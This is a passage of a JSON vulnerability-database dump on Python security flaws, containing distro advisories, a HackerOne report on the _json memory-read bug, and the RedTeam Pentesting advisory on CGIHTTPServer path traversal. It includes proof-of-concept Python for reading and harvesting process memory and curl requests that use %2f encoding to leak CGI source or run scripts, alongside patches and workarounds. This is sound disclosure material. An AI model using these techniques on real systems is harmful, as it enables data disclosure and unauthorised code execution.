(BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html\n\n**Affected packages:**\npython\npython-debug\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-2101.html", "edition": 4, "modified": "2015-11-30T19:48:49", "published": "2015-11-30T19:48:49", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html", "id": "CESA-2015:2101", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1582\n\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage.\n\nA flaw was found in the way the Python SSL module handled X.509 
certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThese updated python packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll users of python are advised to upgrade to these updated packages, which\nfix these issues and add this enhancement.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007256.html\n\n**Affected packages:**\npython\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1582.html", "edition": 3, "modified": "2013-11-26T13:32:42", "published": "2013-11-26T13:32:42", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007256.html", "id": "CESA-2013:1582", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:35:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "**Issue Overview:**\n\nIt was [reported](<http://bugs.python.org/issue21529>) that the Python built-in _json module has a flaw (insufficient bounds checking), which allows a local user to read the current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n_The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user 
to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory._\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.5-13.35.amzn1.i686 \n python27-2.7.5-13.35.amzn1.i686 \n python27-test-2.7.5-13.35.amzn1.i686 \n python27-debuginfo-2.7.5-13.35.amzn1.i686 \n python27-libs-2.7.5-13.35.amzn1.i686 \n python27-devel-2.7.5-13.35.amzn1.i686 \n \n src: \n python27-2.7.5-13.35.amzn1.src \n \n x86_64: \n python27-tools-2.7.5-13.35.amzn1.x86_64 \n python27-libs-2.7.5-13.35.amzn1.x86_64 \n python27-test-2.7.5-13.35.amzn1.x86_64 \n python27-2.7.5-13.35.amzn1.x86_64 \n python27-devel-2.7.5-13.35.amzn1.x86_64 \n python27-debuginfo-2.7.5-13.35.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-23T13:53:00", "published": "2014-07-23T13:53:00", "id": "ALAS-2014-380", "href": "https://alas.aws.amazon.com/ALAS-2014-380.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-10T12:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "**Issue Overview:**\n\nIt was [reported](<http://bugs.python.org/issue21529>) that the Python built-in _json module has a flaw (insufficient bounds checking), which allows a local user to read the current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n_The sole prerequisites of this attack are that the 
attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory._\n\n \n**Affected Packages:** \n\n\npython-simplejson\n\n \n**Issue Correction:** \nRun _yum update python-simplejson_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686 \n python-simplejson-3.5.3-1.7.amzn1.i686 \n \n src: \n python-simplejson-3.5.3-1.7.amzn1.src \n \n x86_64: \n python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64 \n python-simplejson-3.5.3-1.7.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T16:51:00", "published": "2014-07-09T16:51:00", "id": "ALAS-2014-374", "href": "https://alas.aws.amazon.com/ALAS-2014-374.html", "title": "Low: python-simplejson", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-10T12:37:14", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7185", "CVE-2014-4650"], "description": "**Issue Overview:**\n\nIt was [discovered](<http://bugs.python.org/issue21766>) that Python built-in module CGIHTTPServer does not properly handle URL-encoded path separators in URLs which may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root. 
([CVE-2014-4650 __](<https://access.redhat.com/security/cve/CVE-2014-4650>))\n\nInteger overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a \"buffer\" function. ([CVE-2014-7185 __](<https://access.redhat.com/security/cve/CVE-2014-7185>))\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.8-6.74.amzn1.i686 \n python27-debuginfo-2.7.8-6.74.amzn1.i686 \n python27-devel-2.7.8-6.74.amzn1.i686 \n python27-test-2.7.8-6.74.amzn1.i686 \n python27-libs-2.7.8-6.74.amzn1.i686 \n python27-2.7.8-6.74.amzn1.i686 \n \n src: \n python27-2.7.8-6.74.amzn1.src \n \n x86_64: \n python27-debuginfo-2.7.8-6.74.amzn1.x86_64 \n python27-devel-2.7.8-6.74.amzn1.x86_64 \n python27-test-2.7.8-6.74.amzn1.x86_64 \n python27-2.7.8-6.74.amzn1.x86_64 \n python27-libs-2.7.8-6.74.amzn1.x86_64 \n python27-tools-2.7.8-6.74.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2014-11-05T12:15:00", "published": "2014-11-05T12:15:00", "id": "ALAS-2014-440", "href": "https://alas.aws.amazon.com/ALAS-2014-440.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 1500.0, "cvelist": ["CVE-2014-4616"], "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking.\n\nThe sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. 
The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\n\nLet me clarify:\n\nThis is Python-3.4.0/Modules/_json.c:\n\n```\n1035 static PyObject *\n1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)\n1037 {\n1038 /* Python callable interface to scan_once_{str,unicode} */\n1039 PyObject *pystr;\n1040 PyObject *rval;\n1041 Py_ssize_t idx;\n1042 Py_ssize_t next_idx = -1;\n1043 static char *kwlist[] = {\"string\", \"idx\", NULL};\n1044 PyScannerObject *s;\n1045 assert(PyScanner_Check(self));\n1046 s = (PyScannerObject *)self;\n1047 if (!PyArg_ParseTupleAndKeywords(args, kwds, \"On:scan_once\", kwlist, &pystr, &idx))\n1048 return NULL;\n1049\n1050 if (PyUnicode_Check(pystr)) {\n1051 rval = scan_once_unicode(s, pystr, idx, &next_idx);\n1052 }\n1053 else {\n1054 PyErr_Format(PyExc_TypeError,\n1055 \"first argument must be a string, not %.80s\",\n1056 Py_TYPE(pystr)->tp_name);\n1057 return NULL;\n1058 }\n1059 PyDict_Clear(s->memo);\n1060 if (rval == NULL)\n1061 return NULL;\n1062 return _build_rval_index_tuple(rval, next_idx);\n1063 }\n```\n\nAs you can see on line 1047, ParseTuple takes an 'n' as an argument for 'end', which, as can be learned from this page ( https://docs.python.org/3/c-api/arg.html ), means:\n\n```\n n (int) [Py_ssize_t]\n Convert a Python integer to a C Py_ssize_t.\n```\n\nThis means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'end' parameter.\n\nThen onto scanstring_unicode_once to which execution gets transferred through line 1051 
of the code above.\n\n```\n922 static PyObject *\n923 scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t\nidx, Py_ssize_t *next_idx_ptr)\n924 {\n925 /* Read one JSON term (of any kind) from PyUnicode pystr.\n926 idx is the index of the first character of the term\n927 *next_idx_ptr is a return-by-reference index to the first character after\n928 the number.\n929\n930 Returns a new PyObject representation of the term.\n931 */\n932 PyObject *res;\n933 void *str;\n934 int kind;\n935 Py_ssize_t length;\n936\n937 if (PyUnicode_READY(pystr) == -1)\n938 return NULL;\n939\n940 str = PyUnicode_DATA(pystr);\n941 kind = PyUnicode_KIND(pystr);\n942 length = PyUnicode_GET_LENGTH(pystr);\n943\n944 if (idx >= length) {\n945 raise_stop_iteration(idx);\n946 return NULL;\n947 }\n```\n\nHere we see that 'length' is set to the length of the string parameter. This will always be a positive value. On line 945 it is checked whether idx is equal or higher than length; this can never be true in the case of a negative index value.\n\n```\n949 switch (PyUnicode_READ(kind, str, idx)) {\n```\n\nPyUnicode_READ is defined as follows ( in Python-3.4.0/Include/unicodeobject.h ):\n\n```\n516 /* Read a code point from the string's canonical representation. No checks\n517 or ready calls are performed. */\n518 #define PyUnicode_READ(kind, data, index) \\\n519 ((Py_UCS4) \\\n520 ((kind) == PyUnicode_1BYTE_KIND ? \\\n521 ((const Py_UCS1 *)(data))[(index)] : \\\n522 ((kind) == PyUnicode_2BYTE_KIND ? \\\n523 ((const Py_UCS2 *)(data))[(index)] : \\\n524 ((const Py_UCS4 *)(data))[(index)] \\\n525 ) \\\n526 ))\n```\n\nHere we can see that index, which is negative in our example, is used as an array index. 
Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'.\n\nSo, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] will effectively point to an invalid or read-protected page in memory, the Python executable will segfault.\n\nBut there's more. Instead of making it point to an invalid page, let's make it point to something valid:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"99448866\"\n4 b = \"88445522\"\n5 diff = id(a) - id(b)\n6 print(\"Difference is \" + hex(diff))\n7 print j.raw_decode(b)\n8 print j.raw_decode(b, diff)\n```\n\nOutput of this script is:\n\nDifference is -0x30\n(88445522, 8)\n(99448866, -40)\n\nThe difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function.\nInternally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter.\n\nWe can use this harvester to scan memory for valid JSON strings:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"x\" * 1000\n4 for x in range(0, 600000):\n5 try:\n6 print j.raw_decode(a, 0 - x)\n7 except:\n8 pass\n```\n\nThere is one drawback, however. 
We cannot decode strings in this manner because:\n\n```\n296 static PyObject *\n297 scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict, Py_ssize_t *next_end_ptr)\n298 {\n299 /* Read the JSON string from PyUnicode pystr.\n300 end is the index of the first character after the quote.\n301 if strict is zero then literal control characters are allowed\n302 *next_end_ptr is a return-by-reference index of the character\n303 after the end quote\n304\n305 Return value is a new PyUnicode\n306 */\n307 PyObject *rval = NULL;\n308 Py_ssize_t len;\n309 Py_ssize_t begin = end - 1;\n310 Py_ssize_t next /* = begin */;\n311 const void *buf;\n312 int kind;\n313 PyObject *chunks = NULL;\n314 PyObject *chunk = NULL;\n315\n316 if (PyUnicode_READY(pystr) == -1)\n317 return 0;\n318\n319 len = PyUnicode_GET_LENGTH(pystr);\n320 buf = PyUnicode_DATA(pystr);\n321 kind = PyUnicode_KIND(pystr);\n322\n323 if (end < 0 || len < end) {\n324 PyErr_SetString(PyExc_ValueError, \"end is out of bounds\");\n325 goto bail;\n```\n\nthis code actually performs a bounds check by asserting that end (which is our index) isn't negative.\n\nHowever, I successfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] ) from the process memory without any problem or difficulty.\n\nGiven the ubiquity of JSON parsing in Python applications and the limited amount of prerequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases.\n\nHere is a patch for 3.4.0:\n\n```\n--- _json_old.c 2014-04-12 17:47:08.749012372 +0200\n+++ _json.c 2014-04-12 17:44:52.253011645 +0200\n@@ -941,7 +941,7 @@\n kind = PyUnicode_KIND(pystr);\n length = PyUnicode_GET_LENGTH(pystr);\n\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n raise_stop_iteration(idx);\n return NULL;\n }\n```\n\nAnd here is a patch for 2.7.6:\n\n```\n--- _json_old.c 2014-04-12 17:57:14.365015601 +0200\n+++ 
_json.c 2014-04-12 18:04:25.149017898 +0200\n@@ -1491,7 +1491,7 @@\n PyObject *res;\n char *str = PyString_AS_STRING(pystr);\n Py_ssize_t length = PyString_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n@@ -1578,7 +1578,7 @@\n PyObject *res;\n Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);\n Py_ssize_t length = PyUnicode_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n```\n\n\nHere is a script that checks whether the Python binary that executes it is vulnerable:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3\n4 a = '128931233'\n5 b = \"472389423\"\n6\n7 if id(a) < id(b):\n8 x = a\n9 y = b\n10 else:\n11 x = b\n12 y = a\n13\n14 diff = id(x) - id(y)\n15\n16 try:\n17 j.raw_decode(y, diff)\n18 print(\"Vulnerable\")\n19 except:\n20 print(\"Not vulnerable\")\n```\n", "modified": "2014-06-20T05:54:36", "published": "2014-05-16T23:14:13", "id": "H1:12297", "href": "https://hackerone.com/reports/12297", "type": "hackerone", "title": "Python (IBB): Python vulnerability: reading arbitrary process memory", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T20:05:35", "description": "Python CGIHTTPServer Encoded Path Traversal. CVE-2014-4650. Webapps exploits for multiple platform", "published": "2014-06-27T00:00:00", "type": "exploitdb", "title": "Python CGIHTTPServer Encoded Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EDB-ID:33894", "href": "https://www.exploit-db.com/exploits/33894/", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. 
This may enable attackers to disclose a CGI\r\nscript's source code or execute arbitrary CGI scripts in the server's\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n(from the Python documentation)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. 
A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == \"__main__\":\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = (\"\", 8000)\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\r\n httpd = server(server_address, handler)\r\n httpd.serve_forever()\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n[...]\r\n def do_GET(self):\r\n \"\"\"Serve a GET request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n try:\r\n self.copyfile(f, self.wfile)\r\n finally:\r\n f.close()\r\n\r\n def do_HEAD(self):\r\n \"\"\"Serve a HEAD request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n f.close()\r\n\r\n def translate_path(self, path):\r\n [...]\r\n path = posixpath.normpath(urllib.unquote(path))\r\n words = path.split('/')\r\n words = filter(None, words)\r\n path = os.getcwd()\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET() and 
do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\r\nclass overrides send_head() and implements several new methods, such as\r\ndo_POST(), is_cgi() and run_cgi():\r\n\r\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n[...]\r\n def do_POST(self):\r\n [...]\r\n if self.is_cgi():\r\n self.run_cgi()\r\n else:\r\n self.send_error(501, \"Can only POST to CGI scripts\")\r\n\r\n def send_head(self):\r\n \"\"\"Version of send_head that support CGI scripts\"\"\"\r\n if self.is_cgi():\r\n return self.run_cgi()\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\r\n\r\n def is_cgi(self):\r\n [...]\r\n collapsed_path = _url_collapse_path(self.path)\r\n dir_sep = collapsed_path.find('/', 1)\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi(self):\r\n \"\"\"Execute a CGI script.\"\"\"\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find('/')\r\n if i >= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, ''\r\n\r\n scriptname = dir + '/' + script\r\n scriptfile = self.translate_path(scriptname)\r\n if not os.path.exists(scriptfile):\r\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\r\n return\r\n if not os.path.isfile(scriptfile):\r\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\r\n scriptname)\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\r\ncalls is_cgi() to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\r\nnormalize the path, i.e. remove extraneous slashes (/),current directory\r\n(.), or parent directory (..) 
elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi() function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collapse_path() and is_cgi() never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant %2f leads to\r\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\r\nsend_head() then invoke its parent's send_head() method which translates\r\nthe URL path to a file system path using the translate_path() method and\r\nthen outputs the file's contents raw. As translate_path() URL decodes\r\nthe path, this then succeeds and discloses the CGI script's file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin%2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root (the current working directory) can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n<p>Error code 403.\r\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\r\n[...]\r\n\r\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\r\nreturned True.
Next, run_cgi() further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script's filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi() returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with %2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\r\n{\"text\": \"This is a Test\"}\r\n\r\nThis is because neither is_cgi() nor run_cgi() URL decode the path\r\nduring processing until run_cgi() tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir%2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\r\n{\"text\": \"This is a Test\"}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\r\n def is_cgi(self):\r\n self.path = urllib.unquote(self.path)\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitive\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed.
However, this is limited to files\r\nstored in the server's working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\r\nDennewartstr. 
25-27 Fax : +49 241 510081-99\r\n52068 Aachen https://www.redteam-pentesting.de\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/33894/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:25", "description": "", "published": "2014-06-27T00:00:00", "type": "packetstorm", "title": "Python CGIHTTPServer File Disclosure / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "PACKETSTORM:127241", "href": "https://packetstormsecurity.com/files/127241/Python-CGIHTTPServer-File-Disclosure-Code-Execution.html", "sourceData": "`Advisory: Python CGIHTTPServer File Disclosure and Potential Code \nExecution \n \nThe CGIHTTPServer Python module does not properly handle URL-encoded \npath separators in URLs. This may enable attackers to disclose a CGI \nscript's source code or execute arbitrary CGI scripts in the server's \ndocument root. \n \nDetails \n======= \n \nProduct: Python CGIHTTPServer \nAffected Versions: \n2.7 - 2.7.7, \n3.2 - 3.2.4, \n3.3 - 3.3.2, \n3.4 - 3.4.1, \n3.5 pre-release \nFixed Versions: \n2.7 rev b4bab0788768, \n3.2 rev e47422855841, \n3.3 rev 5676797f3a3e, \n3.4 rev 847e288d6e93, \n3.5 rev f8b3bb5eb190 \nVulnerability Type: File Disclosure, Directory Traversal, Code Execution \nSecurity Risk: high \nVendor URL: https://docs.python.org/2/library/cgihttpserver.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008 \nAdvisory Status: published \nCVE: CVE-2014-4650 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650 \n \n \nIntroduction \n============ \n \nThe CGIHTTPServer module defines a request-handler class, interface \ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits \nbehavior from SimpleHTTPServer.
